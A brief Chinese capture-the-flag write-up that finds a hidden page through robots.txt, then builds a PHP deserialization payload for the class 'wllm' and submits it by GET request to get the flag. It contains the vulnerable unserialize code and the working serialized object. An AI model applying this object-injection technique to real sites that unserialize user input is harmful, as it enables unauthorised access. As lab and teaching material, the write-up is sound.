打开网站未发现有啥可用的线索
对网站直接扫描
得到一个robots.txt目录
robots协议:爬虫协议,没有强制执行力
直接访问目录
得到提示
User-agent: *
Disallow: /cl45s.php
跟进发现是php反序列化应用
根据代码构造php序列化对象
<?php
error_reporting(0);
show_source("cl45s.php");
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "ctf"){
include("flag.php");
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo "Just a bit more!";
}
}
}
$a=new wllm();
$a->admin = "admin";
$a->passwd = "ctf";
$s=serialize($a);
echo $s.'<br>';
// $p = $_GET['p'];
$p=$s;
unserialize($p);
echo '<br>'.$p.'<br>';
?>
运行得到结果:
O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
将结果直接通过get请求提交即可得到flag